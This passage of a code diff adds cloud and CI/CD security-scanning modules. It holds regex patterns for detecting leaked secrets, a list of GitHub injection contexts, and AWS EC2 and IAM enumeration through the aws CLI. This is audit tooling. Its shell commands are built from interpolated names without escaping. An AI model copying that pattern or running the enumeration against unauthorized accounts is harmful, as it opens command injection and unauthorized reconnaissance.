+    id: z.string(),
+    target: z.string(),
+    profile: ProfileId,
+    status: Status,
+    pipelines: z.array(PipelineConfig).default([]),
+    findings: z.array(CICDFinding).default([]),
+    gateResult: GateResult.optional(),
+    sastResults: z.array(SASTResult).default([]),
+    stats: ScanStats,
+    startedAt: z.number(),
+    completedAt: z.number().optional(),
+    error: z.string().optional(),
+  })
+  export type CICDScanResult = z.infer<typeof CICDScanResult>
+
+  // ===== CONSTANTS =====
+
+  /** Common secret patterns */
+  export const SECRET_PATTERNS: SecretPattern[] = [
+    {
+      id: "github-token",
+      name: "GitHub Token",
+      pattern: "gh[pousr]_[A-Za-z0-9_]{36,255}",
+      severity: "critical",
+      description: "GitHub Personal Access Token or OAuth token",
+    },
+    {
+      id: "github-fine-grained",
+      name: "GitHub Fine-Grained Token",
+      pattern: "github_pat_[A-Za-z0-9_]{22,}",
+      severity: "critical",
+      description: "GitHub Fine-Grained Personal Access Token",
+    },
+    {
+      id: "aws-access-key",
+      name: "AWS Access Key",
+      pattern: "AKIA[0-9A-Z]{16}",
+      severity: "critical",
+      description: "AWS Access Key ID",
+    },
+    {
+      id: "aws-secret-key",
+      name: "AWS Secret Key",
+      pattern: "[A-Za-z0-9/+=]{40}",
+      severity: "critical",
+      description: "AWS Secret Access Key (requires context)",
+    },
+    {
+      id: "azure-storage",
+      name: "Azure Storage Key",
+      pattern: "[A-Za-z0-9+/]{86}==",
+      severity: "critical",
+      description: "Azure Storage Account Key",
+    },
+    {
+      id: "gcp-api-key",
+      name: "GCP API Key",
+      pattern: "AIza[0-9A-Za-z\\-_]{35}",
+      severity: "critical",
+      description: "Google Cloud API Key",
+    },
+    {
+      id: "gcp-service-account",
+      name: "GCP Service Account",
+      pattern: '"type"\\s*:\\s*"service_account"',
+      severity: "critical",
+      description: "GCP Service Account JSON",
+    },
+    {
+      id: "slack-token",
+      name: "Slack Token",
+      pattern: "xox[baprs]-[0-9A-Za-z-]{10,}",
+      severity: "high",
+      description: "Slack API Token",
+    },
+    {
+      id: "slack-webhook",
+      name: "Slack Webhook",
+      pattern: "https://hooks\\.slack\\.com/services/T[A-Z0-9]+/B[A-Z0-9]+/[A-Za-z0-9]+",
+      severity: "high",
+      description: "Slack Incoming Webhook URL",
+    },
+    {
+      id: "npm-token",
+      name: "NPM Token",
+      pattern: "npm_[A-Za-z0-9]{36}",
+      severity: "critical",
+      description: "NPM Access Token",
+    },
+    {
+      id: "pypi-token",
+      name: "PyPI Token",
+      pattern: "pypi-AgEIcHlwaS5vcmc[A-Za-z0-9-_]{50,}",
+      severity: "critical",
+      description: "PyPI API Token",
+    },
+    {
+      id: "docker-hub",
+      name: "Docker Hub Token",
+      pattern: "dckr_pat_[A-Za-z0-9_-]{27,}",
+      severity: "high",
+      description: "Docker Hub Personal Access Token",
+    },
+    {
+      id: "generic-api-key",
+      name: "Generic API Key",
+      pattern: "(?i)(api[_-]?key|apikey)['\"]?\\s*[:=]\\s*['\"]?[A-Za-z0-9_-]{20,}['\"]?",
+      severity: "medium",
+      description: "Generic API key pattern",
+    },
+    {
+      id: "generic-secret",
+      name: "Generic Secret",
+      pattern: "(?i)(secret|password|passwd|pwd)['\"]?\\s*[:=]\\s*['\"]?[^\\s'\"]{8,}['\"]?",
+      severity: "high",
+      description: "Generic secret/password pattern",
+    },
+    {
+      id: "private-key",
+      name: "Private Key",
+      pattern: "-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----",
+      severity: "critical",
+      description: "Private key header",
+    },
+    {
+      id: "jwt-token",
+      name: "JWT Token",
+      pattern: "eyJ[A-Za-z0-9_-]{10,}\\.[A-Za-z0-9_-]{10,}\\.[A-Za-z0-9_-]{10,}",
+      severity: "high",
+      description: "JSON Web Token",
+    },
+  ]
+
+  /** Dangerous GitHub contexts (injection vectors) */
+  export const DANGEROUS_GITHUB_CONTEXTS = [
+    "github.event.issue.title",
+    "github.event.issue.body",
+    "github.event.pull_request.title",
+    "github.event.pull_request.body",
+    "github.event.comment.body",
+    "github.event.review.body",
+    "github.event.review_comment.body",
+    "github.event.head_commit.message",
+    "github.event.head_commit.author.email",
+    "github.event.head_commit.author.name",
+    "github.event.commits[*].message",
+    "github.event.commits[*].author.email",
+    "github.event.commits[*].author.name",
+    "github.head_ref",
+    "github.event.workflow_run.head_branch",
+    "github.event.workflow_run.head_commit.message",
+  ]
+
+  /** Trusted GitHub action prefixes */
+  export const TRUSTED_ACTION_PREFIXES = [
+    "actions/",
+    "github/",
+    "docker/",
+    "azure/",
+    "aws-actions/",
+    "google-github-actions/",
+    "hashicorp/",
+  ]
+
+  /** Risky permissions */
+  export const RISKY_PERMISSIONS = [
+    { resource: "contents", scope: "write", reason: "Can modify repository contents" },
+    { resource: "actions", scope: "write", reason: "Can modify workflow files" },
+    { resource: "packages", scope: "write", reason: "Can publish packages" },
+    { resource: "deployments", scope: "write", reason: "Can create deployments" },
+    { resource: "id-token", scope: "write", reason: "Can request OIDC tokens" },
+    { resource: "pull-requests", scope: "write", reason: "Can modify pull requests" },
+    { resource: "security-events", scope: "write", reason: "Can modify security alerts" },
+  ]
+
+  /** CI/CD config file patterns by provider */
+  export const CONFIG_PATTERNS: Record<Provider, string[]> = {
+    github: [".github/workflows/*.yml", ".github/workflows/*.yaml"],
+    gitlab: [".gitlab-ci.yml", ".gitlab-ci.yaml", "*.gitlab-ci.yml"],
+    jenkins: ["Jenkinsfile", "Jenkinsfile.*", "jenkins/*.groovy", ".jenkins/*.groovy"],
+    azure: ["azure-pipelines.yml", "azure-pipelines.yaml", ".azure-pipelines/*.yml"],
+    circleci: [".circleci/config.yml", ".circleci/config.yaml"],
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/aws/ec2.ts b/packages/opencode/src/pentest/cloudscan/aws/ec2.ts
new file mode 100644
index 00000000000..3f6b51ac9c6
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/aws/ec2.ts
@@ -0,0 +1,434 @@
+/**
+ * @fileoverview AWS EC2 Analysis
+ *
+ * EC2 instance enumeration and security analysis for AWS.
+ *
+ * @module pentest/cloudscan/aws/ec2
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { AWSCLIParser } from "../parsers/aws-cli"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.aws.ec2" })
+
+/**
+ * AWS EC2 options.
+ */
+export interface AWSEC2Options {
+  profile?: string
+  region?: string
+  timeout?: number
+}
+
+/**
+ * AWS EC2 result.
+ */
+export interface AWSEC2Result {
+  instances: CloudScanTypes.ComputeInstance[]
+  vpcs: CloudScanTypes.VirtualNetwork[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * AWS EC2 namespace.
+ */
+export namespace AWSEC2 {
+  /**
+   * Enumerate all EC2 instances and VPCs.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: AWSEC2Options = {}
+  ): Promise<AWSEC2Result> {
+    const result: AWSEC2Result = {
+      instances: [],
+      vpcs: [],
+      findings: [],
+      issues: [],
+    }
+
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const regionFlag = options.region ? `--region ${options.region}` : ""
+
+    try {
+      // Enumerate instances
+      log.info("Enumerating EC2 instances", { region: options.region })
+      const instancesOutput = await runAWSCommand(
+        `aws ec2 describe-instances ${profileFlag} ${regionFlag} --output json`,
+        options.timeout
+      )
+
+      if (instancesOutput) {
+        result.instances = AWSCLIParser.parseInstances(instancesOutput)
+
+        // Set region for all instances
+        for (const instance of result.instances) {
+          instance.region = options.region
+        }
+
+        result.findings.push(`Found ${result.instances.length} EC2 instances`)
+
+        for (const instance of result.instances) {
+          Bus.publish(CloudScanEvents.InstanceFound, {
+            scanID,
+            provider: "aws",
+            instanceId: instance.id,
+            instanceName: instance.name,
+            instanceType: instance.instanceType,
+            state: instance.state,
+            isPublic: instance.publiclyAccessible,
+            region: instance.region,
+          })
+        }
+      }
+
+      // Enumerate VPCs
+      log.info("Enumerating VPCs", { region: options.region })
+      const vpcsOutput = await runAWSCommand(
+        `aws ec2 describe-vpcs ${profileFlag} ${regionFlag} --output json`,
+        options.timeout
+      )
+
+      if (vpcsOutput) {
+        result.vpcs = AWSCLIParser.parseVPCs(vpcsOutput)
+
+        // Enrich VPC details
+        for (const vpc of result.vpcs) {
+          vpc.region = options.region
+          await enrichVPCDetails(vpc, profileFlag, regionFlag, options.timeout)
+        }
+
+        result.findings.push(`Found ${result.vpcs.length} VPCs`)
+      }
+
+      // Analyze for security issues
+      result.issues = analyzeEC2Security(scanID, result)
+
+    } catch (err) {
+      log.error("EC2 enumeration failed", { error: String(err) })
+      result.findings.push(`EC2 enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get instances with public IPs.
+   */
+  export async function getPublicInstances(
+    options: AWSEC2Options = {}
+  ): Promise<CloudScanTypes.ComputeInstance[]> {
+    const { instances } = await enumerate("check", options)
+    return instances.filter((i) => i.publiclyAccessible && i.state === "running")
+  }
+
+  /**
+   * Get instances without IMDSv2.
+   */
+  export async function getInstancesWithoutIMDSv2(
+    options: AWSEC2Options = {}
+  ): Promise<CloudScanTypes.ComputeInstance[]> {
+    const { instances } = await enumerate("check", options)
+    return instances.filter((i) => !i.imdsV2Required && i.state === "running")
+  }
+
+  /**
+   * Get instances with unencrypted volumes.
+   */
+  export async function getInstancesWithUnencryptedVolumes(
+    options: AWSEC2Options = {}
+  ): Promise<CloudScanTypes.ComputeInstance[]> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const regionFlag = options.region ? `--region ${options.region}` : ""
+
+    try {
+      const instancesOutput = await runAWSCommand(
+        `aws ec2 describe-instances ${profileFlag} ${regionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!instancesOutput) return []
+
+      const instances = AWSCLIParser.parseInstances(instancesOutput)
+      const result: CloudScanTypes.ComputeInstance[] = []
+
+      for (const instance of instances) {
+        if (instance.state !== "running") continue
+
+        // Get volumes for this instance
+        const volumesOutput = await runAWSCommand(
+          `aws ec2 describe-volumes --filters Name=attachment.instance-id,Values=${instance.id} ${profileFlag} ${regionFlag} --output json`,
+          options.timeout
+        )
+
+        if (volumesOutput) {
+          const data = JSON.parse(volumesOutput)
+          const volumes = data.Volumes || []
+
+          const hasUnencrypted = volumes.some((v: any) => !v.Encrypted)
+          if (hasUnencrypted) {
+            instance.encryptedVolumes = false
+            result.push(instance)
+          } else {
+            instance.encryptedVolumes = true
+          }
+        }
+      }
+
+      return result
+    } catch (err) {
+      log.error("Failed to check volume encryption", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Get VPCs without flow logs.
+   */
+  export async function getVPCsWithoutFlowLogs(
+    options: AWSEC2Options = {}
+  ): Promise<CloudScanTypes.VirtualNetwork[]> {
+    const { vpcs } = await enumerate("check", options)
+    return vpcs.filter((v) => !v.flowLogsEnabled)
+  }
+
+  /**
+   * Check instance metadata service configuration.
+   */
+  export async function checkIMDS(
+    instanceId: string,
+    options: AWSEC2Options = {}
+  ): Promise<{
+    imdsEnabled: boolean
+    imdsV1Enabled: boolean
+    imdsV2Required: boolean
+    hopLimit: number
+  }> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const regionFlag = options.region ? `--region ${options.region}` : ""
+
+    try {
+      const output = await runAWSCommand(
+        `aws ec2 describe-instances --instance-ids ${instanceId} ${profileFlag} ${regionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!output) {
+        return { imdsEnabled: true, imdsV1Enabled: true, imdsV2Required: false, hopLimit: 1 }
+      }
+
+      const data = JSON.parse(output)
+      const instance = data.Reservations?.[0]?.Instances?.[0]
+      const metadataOptions = instance?.MetadataOptions || {}
+
+      return {
+        imdsEnabled: metadataOptions.HttpEndpoint !== "disabled",
+        imdsV1Enabled: metadataOptions.HttpTokens !== "required",
+        imdsV2Required: metadataOptions.HttpTokens === "required",
+        hopLimit: metadataOptions.HttpPutResponseHopLimit || 1,
+      }
+    } catch (err) {
+      log.error("Failed to check IMDS", { instanceId, error: String(err) })
+      return { imdsEnabled: true, imdsV1Enabled: true, imdsV2Required: false, hopLimit: 1 }
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runAWSCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("AWS command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  async function enrichVPCDetails(
+    vpc: CloudScanTypes.VirtualNetwork,
+    profileFlag: string,
+    regionFlag: string,
+    timeout?: number
+  ): Promise<void> {
+    try {
+      // Get subnets
+      const subnetsOutput = await runAWSCommand(
+        `aws ec2 describe-subnets --filters Name=vpc-id,Values=${vpc.id} ${profileFlag} ${regionFlag} --output json`,
+        timeout
+      )
+
+      if (subnetsOutput) {
+        const data = JSON.parse(subnetsOutput)
+        vpc.subnets = (data.Subnets || []).map((s: any) => s.SubnetId)
+      }
+
+      // Get security groups
+      const sgsOutput = await runAWSCommand(
+        `aws ec2 describe-security-groups --filters Name=vpc-id,Values=${vpc.id} ${profileFlag} ${regionFlag} --output json`,
+        timeout
+      )
+
+      if (sgsOutput) {
+        const data = JSON.parse(sgsOutput)
+        vpc.securityGroups = (data.SecurityGroups || []).map((sg: any) => sg.GroupId)
+      }
+
+      // Check flow logs
+      const flowLogsOutput = await runAWSCommand(
+        `aws ec2 describe-flow-logs --filter Name=resource-id,Values=${vpc.id} ${profileFlag} ${regionFlag} --output json`,
+        timeout
+      )
+
+      if (flowLogsOutput) {
+        const data = JSON.parse(flowLogsOutput)
+        vpc.flowLogsEnabled = (data.FlowLogs || []).length > 0
+      }
+    } catch (err) {
+      log.debug("Failed to enrich VPC details", { vpcId: vpc.id, error: String(err) })
+    }
+  }
+
+  function analyzeEC2Security(
+    scanID: string,
+    result: AWSEC2Result
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    // Check instances
+    for (const instance of result.instances) {
+      if (instance.state !== "running") continue
+
+      // Public instance without IMDSv2
+      if (instance.publiclyAccessible && !instance.imdsV2Required) {
+        findings.push(createInstanceFinding(
+          scanID,
+          "high",
+          "Public Instance Without IMDSv2",
+          `Instance ${instance.name} (${instance.id}) is publicly accessible and does not require IMDSv2.`,
+          instance
+        ))
+      }
+
+      // Instance without IAM role
+      if (!instance.iamRole) {
+        findings.push(createInstanceFinding(
+          scanID,
+          "info",
+          "Instance Without IAM Role",
+          `Instance ${instance.name} (${instance.id}) does not have an IAM role attached.`,
+          instance
+        ))
+      }
+    }
+
+    // Check VPCs
+    for (const vpc of result.vpcs) {
+      // VPC without flow logs
+      if (!vpc.flowLogsEnabled) {
+        findings.push(createVPCFinding(
+          scanID,
+          "medium",
+          "VPC Without Flow Logs",
+          `VPC ${vpc.name} (${vpc.id}) does not have flow logs enabled.`,
+          vpc
+        ))
+      }
+
+      // Default VPC
+      if (vpc.isDefault) {
+        findings.push(createVPCFinding(
+          scanID,
+          "low",
+          "Default VPC In Use",
+          `Default VPC ${vpc.id} exists. Consider using custom VPCs for better network isolation.`,
+          vpc
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createInstanceFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    instance: CloudScanTypes.ComputeInstance
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `aws_ec2_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "aws",
+      region: instance.region,
+      severity,
+      title,
+      description,
+      resourceType: "instance",
+      resourceId: instance.id,
+      category: "compute",
+      complianceFrameworks: ["cis"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "aws",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "compute",
+      resourceType: "instance",
+      resourceId: instance.id,
+    })
+
+    return finding
+  }
+
+  function createVPCFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    vpc: CloudScanTypes.VirtualNetwork
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `aws_vpc_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "aws",
+      region: vpc.region,
+      severity,
+      title,
+      description,
+      resourceType: "vpc",
+      resourceId: vpc.id,
+      category: "network",
+      complianceFrameworks: ["cis"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "aws",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "network",
+      resourceType: "vpc",
+      resourceId: vpc.id,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/aws/iam.ts b/packages/opencode/src/pentest/cloudscan/aws/iam.ts
new file mode 100644
index 00000000000..699583eaa43
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/aws/iam.ts
@@ -0,0 +1,510 @@
+/**
+ * @fileoverview AWS IAM Enumeration and Analysis
+ *
+ * IAM user, role, group, and policy enumeration for AWS.
+ *
+ * @module pentest/cloudscan/aws/iam
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { AWSCLIParser } from "../parsers/aws-cli"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.aws.iam" })
+
+/**
+ * AWS IAM options.
+ */
+export interface AWSIAMOptions {
+  profile?: string
+  region?: string
+  timeout?: number
+}
+
+/**
+ * AWS IAM enumeration result.
+ */
+export interface AWSIAMResult {
+  users: CloudScanTypes.IAMPrincipal[]
+  groups: CloudScanTypes.IAMGroup[]
+  roles: CloudScanTypes.IAMRole[]
+  policies: CloudScanTypes.IAMPolicy[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * AWS IAM namespace.
+ */
+export namespace AWSIAM {
+  /**
+   * Enumerate all IAM resources.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: AWSIAMOptions = {}
+  ): Promise<AWSIAMResult> {
+    const result: AWSIAMResult = {
+      users: [],
+      groups: [],
+      roles: [],
+      policies: [],
+      findings: [],
+      issues: [],
+    }
+
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+
+    try {
+      // Enumerate users
+      log.info("Enumerating IAM users")
+      const usersOutput = await runAWSCommand(`aws iam list-users ${profileFlag} --output json`, options.timeout)
+      if (usersOutput) {
+        result.users = AWSCLIParser.parseUsers(usersOutput)
+
+        // Get details for each user
+        for (const user of result.users) {
+          await enrichUserDetails(user, profileFlag, options.timeout)
+
+          Bus.publish(CloudScanEvents.IAMUserFound, {
+            scanID,
+            provider: "aws",
+            userName: user.name,
+            userId: user.id,
+            mfaEnabled: user.mfaEnabled,
+            accessKeyCount: user.accessKeys.length,
+            hasConsoleAccess: !!user.passwordLastUsed,
+          })
+        }
+
+        result.findings.push(`Found ${result.users.length} IAM users`)
+      }
+
+      // Enumerate groups
+      log.info("Enumerating IAM groups")
+      const groupsOutput = await runAWSCommand(`aws iam list-groups ${profileFlag} --output json`, options.timeout)
+      if (groupsOutput) {
+        result.groups = AWSCLIParser.parseGroups(groupsOutput)
+        result.findings.push(`Found ${result.groups.length} IAM groups`)
+      }
+
+      // Enumerate roles
+      log.info("Enumerating IAM roles")
+      const rolesOutput = await runAWSCommand(`aws iam list-roles ${profileFlag} --output json`, options.timeout)
+      if (rolesOutput) {
+        result.roles = AWSCLIParser.parseRoles(rolesOutput)
+
+        for (const role of result.roles) {
+          Bus.publish(CloudScanEvents.IAMRoleFound, {
+            scanID,
+            provider: "aws",
+            roleName: role.name,
+            roleArn: role.arn,
+            trustedEntities: role.trustedEntities.length,
+            isServiceLinked: role.isServiceLinked,
+          })
+        }
+
+        result.findings.push(`Found ${result.roles.length} IAM roles`)
+      }
+
+      // Enumerate customer-managed policies
+      log.info("Enumerating IAM policies")
+      const policiesOutput = await runAWSCommand(
+        `aws iam list-policies --scope Local ${profileFlag} --output json`,
+        options.timeout
+      )
+      if (policiesOutput) {
+        result.policies = AWSCLIParser.parsePolicies(policiesOutput)
+        result.findings.push(`Found ${result.policies.length} customer-managed policies`)
+      }
+
+      // Analyze for security issues
+      result.issues = analyzeIAMSecurity(scanID, result)
+
+    } catch (err) {
+      log.error("IAM enumeration failed", { error: String(err) })
+      result.findings.push(`IAM enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get users without MFA.
+   */
+  export async function getUsersWithoutMFA(
+    options: AWSIAMOptions = {}
+  ): Promise<CloudScanTypes.IAMPrincipal[]> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+
+    try {
+      const output = await runAWSCommand(`aws iam list-users ${profileFlag} --output json`, options.timeout)
+      if (!output) return []
+
+      const users = AWSCLIParser.parseUsers(output)
+
+      // Check MFA for each user
+      for (const user of users) {
+        const mfaOutput = await runAWSCommand(
+          `aws iam list-mfa-devices --user-name ${user.name} ${profileFlag} --output json`,
+          options.timeout
+        )
+        if (mfaOutput) {
+          const devices = AWSCLIParser.parseMFADevices(mfaOutput)
+          user.mfaEnabled = devices.length > 0
+        }
+      }
+
+      return users.filter((u) => !u.mfaEnabled && u.passwordLastUsed)
+    } catch (err) {
+      log.error("Failed to get users without MFA", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Get users with old access keys.
+   */
+  export async function getUsersWithOldAccessKeys(
+    maxAgeDays: number = 90,
+    options: AWSIAMOptions = {}
+  ): Promise<CloudScanTypes.IAMPrincipal[]> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const maxAgeMs = maxAgeDays * 24 * 60 * 60 * 1000
+    const cutoff = Date.now() - maxAgeMs
+
+    try {
+      const output = await runAWSCommand(`aws iam list-users ${profileFlag} --output json`, options.timeout)
+      if (!output) return []
+
+      const users = AWSCLIParser.parseUsers(output)
+      const result: CloudScanTypes.IAMPrincipal[] = []
+
+      for (const user of users) {
+        const keysOutput = await runAWSCommand(
+          `aws iam list-access-keys --user-name ${user.name} ${profileFlag} --output json`,
+          options.timeout
+        )
+        if (keysOutput) {
+          const keys = AWSCLIParser.parseAccessKeys(keysOutput)
+          const oldKeys = keys.filter(
+            (k) => k.status === "active" && k.createdAt && k.createdAt < cutoff
+          )
+
+          if (oldKeys.length > 0) {
+            user.accessKeys = oldKeys.map((k) => ({
+              id: k.id,
+              status: k.status,
+              createdAt: k.createdAt,
+            }))
+            result.push(user)
+          }
+        }
+      }
+
+      return result
+    } catch (err) {
+      log.error("Failed to get users with old access keys", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Analyze policy for overly permissive statements.
+   */
+  export async function analyzePolicy(
+    policyArn: string,
+    options: AWSIAMOptions = {}
+  ): Promise<{
+    policy: CloudScanTypes.IAMPolicy | null
+    statements: CloudScanTypes.IAMPolicyStatement[]
+    issues: string[]
+  }> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const issues: string[] = []
+
+    try {
+      // Get policy
+      const policyOutput = await runAWSCommand(
+        `aws iam get-policy --policy-arn ${policyArn} ${profileFlag} --output json`,
+        options.timeout
+      )
+      if (!policyOutput) {
+        return { policy: null, statements: [], issues: ["Failed to get policy"] }
+      }
+
+      const data = JSON.parse(policyOutput)
+      const defaultVersion = data.Policy?.DefaultVersionId
+
+      if (!defaultVersion) {
+        return { policy: null, statements: [], issues: ["No default version found"] }
+      }
+
+      // Get policy version
+      const versionOutput = await runAWSCommand(
+        `aws iam get-policy-version --policy-arn ${policyArn} --version-id ${defaultVersion} ${profileFlag} --output json`,
+        options.timeout
+      )
+      if (!versionOutput) {
+        return { policy: null, statements: [], issues: ["Failed to get policy version"] }
+      }
+
+      const statements = AWSCLIParser.parsePolicyDocument(versionOutput)
+
+      // Analyze statements
+      for (const stmt of statements) {
+        if (stmt.effect === "Allow") {
+          // Check for wildcard actions
+          if (stmt.actions.includes("*")) {
+            issues.push("Policy allows ALL actions (*)")
+          }
+
+          // Check for high-risk actions
+          for (const action of stmt.actions) {
+            if (CloudScanTypes.HIGH_RISK_ACTIONS.includes(action)) {
+              issues.push(`Policy allows high-risk action: ${action}`)
+            }
+          }
+
+          // Check for wildcard resources
+          if (stmt.resources.includes("*")) {
+            issues.push("Policy applies to ALL resources (*)")
+          }
+        }
+      }
+
+      const policy: CloudScanTypes.IAMPolicy = {
+        id: policyArn.split("/").pop() || policyArn,
+        arn: policyArn,
+        name: data.Policy?.PolicyName || policyArn.split("/").pop() || "",
+        provider: "aws",
+        type: policyArn.includes(":aws:policy/") ? "aws-managed" : "customer",
+        statements,
+        attachedTo: [],
+        isOverlyPermissive: issues.length > 0,
+        issues,
+      }
+
+      return { policy, statements, issues }
+    } catch (err) {
+      log.error("Failed to analyze policy", { error: String(err) })
+      return { policy: null, statements: [], issues: [String(err)] }
+    }
+  }
+
+  /**
+   * Get roles with overly permissive trust policies.
+   */
+  export async function getRolesWithPublicTrust(
+    options: AWSIAMOptions = {}
+  ): Promise<CloudScanTypes.IAMRole[]> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+
+    try {
+      const output = await runAWSCommand(`aws iam list-roles ${profileFlag} --output json`, options.timeout)
+      if (!output) return []
+
+      const roles = AWSCLIParser.parseRoles(output)
+
+      // Filter roles with public trust
+      return roles.filter((role) => {
+        return role.trustedEntities.some(
+          (entity) => entity === "*" || entity === "arn:aws:iam::*:root"
+        )
+      })
+    } catch (err) {
+      log.error("Failed to get roles with public trust", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runAWSCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("AWS command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  async function enrichUserDetails(
+    user: CloudScanTypes.IAMPrincipal,
+    profileFlag: string,
+    timeout?: number
+  ): Promise<void> {
+    try {
+      // Get access keys
+      const keysOutput = await runAWSCommand(
+        `aws iam list-access-keys --user-name ${user.name} ${profileFlag} --output json`,
+        timeout
+      )
+      if (keysOutput) {
+        user.accessKeys = AWSCLIParser.parseAccessKeys(keysOutput).map((k) => ({
+          id: k.id,
+          status: k.status,
+          createdAt: k.createdAt,
+        }))
+      }
+
+      // Get MFA devices
+      const mfaOutput = await runAWSCommand(
+        `aws iam list-mfa-devices --user-name ${user.name} ${profileFlag} --output json`,
+        timeout
+      )
+      if (mfaOutput) {
+        const devices = AWSCLIParser.parseMFADevices(mfaOutput)
+        user.mfaEnabled = devices.length > 0
+      }
+
+      // Get attached policies
+      const policiesOutput = await runAWSCommand(
+        `aws iam list-attached-user-policies --user-name ${user.name} ${profileFlag} --output json`,
+        timeout
+      )
+      if (policiesOutput) {
+        const data = JSON.parse(policiesOutput)
+        user.attachedPolicies = (data.AttachedPolicies || []).map((p: any) => p.PolicyArn)
+      }
+
+      // Get groups
+      const groupsOutput = await runAWSCommand(
+        `aws iam list-groups-for-user --user-name ${user.name} ${profileFlag} --output json`,
+        timeout
+      )
+      if (groupsOutput) {
+        const data = JSON.parse(groupsOutput)
+        user.groups = (data.Groups || []).map((g: any) => g.GroupName)
+      }
+    } catch (err) {
+      log.debug("Failed to enrich user details", { user: user.name, error: String(err) })
+    }
+  }
+
+  function analyzeIAMSecurity(
+    scanID: string,
+    result: AWSIAMResult
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    // Check for root account usage
+    const rootUser = result.users.find((u) => u.name === "root")
+    if (rootUser && rootUser.accessKeys.length > 0) {
+      findings.push(createFinding(
+        scanID,
+        "critical",
+        "Root Account Has Access Keys",
+        "The root account has active access keys. Access keys should not be used for the root account.",
+        "user",
+        "root"
+      ))
+    }
+
+    // Check for users without MFA
+    const usersWithoutMFA = result.users.filter(
+      (u) => !u.mfaEnabled && u.passwordLastUsed
+    )
+    if (usersWithoutMFA.length > 0) {
+      for (const user of usersWithoutMFA) {
+        findings.push(createFinding(
+          scanID,
+          "high",
+          "IAM User Without MFA",
+          `User ${user.name} has console access but MFA is not enabled.`,
+          "user",
+          user.id
+        ))
+
+        Bus.publish(CloudScanEvents.IAMPolicyIssue, {
+          scanID,
+          provider: "aws",
+          policyName: "MFA",
+          issue: `User ${user.name} does not have MFA enabled`,
+          severity: "high",
+        })
+      }
+    }
+
+    // Check for old access keys
+    const maxKeyAge = 90 * 24 * 60 * 60 * 1000 // 90 days
+    for (const user of result.users) {
+      for (const key of user.accessKeys) {
+        if (key.status === "active" && key.createdAt) {
+          const age = Date.now() - key.createdAt
+          if (age > maxKeyAge) {
+            findings.push(createFinding(
+              scanID,
+              "medium",
+              "Old IAM Access Key",
+              `User ${user.name} has an access key older than 90 days.`,
+              "user",
+              user.id
+            ))
+          }
+        }
+      }
+    }
+
+    // Check for roles with overly permissive trust
+    for (const role of result.roles) {
+      if (role.trustedEntities.includes("*")) {
+        findings.push(createFinding(
+          scanID,
+          "critical",
+          "Role With Public Trust Policy",
+          `Role ${role.name} can be assumed by any AWS account.`,
+          "role",
+          role.id
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    resourceType: CloudScanTypes.ResourceType,
+    resourceId: string
